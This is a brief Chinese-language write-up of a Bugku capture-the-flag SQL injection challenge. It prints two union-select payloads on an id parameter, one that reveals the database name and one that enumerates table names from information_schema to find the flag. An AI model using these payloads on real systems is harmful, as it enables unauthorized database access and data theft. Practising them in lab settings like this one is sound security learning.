bugku实战2-注入

打开页面寻找注入点，发现有一个页面下id=25，yes，可以进行注入了，比较简单，主要是记录下过程。

id=2 and 1=2 union select 1,database(),3,4,5

可以得到数据库的名称，之后利用数据库名称进行注入获取表，啊我比较蠢，老是忘记数据表要加双引号，一定要记住惹。然后就是不用group_concat,这个好像一行放不下所有的，最后一个表就看不见名称，直接所有的都打印出来。

id=2%20and%201=2%20union%20select%201,table_name,3,4,5%20from%20information_schema.tables%20where%20table_schema=%27u9897uwx_kabel%27%23

之后页面会出现所有表的名称，得到flag。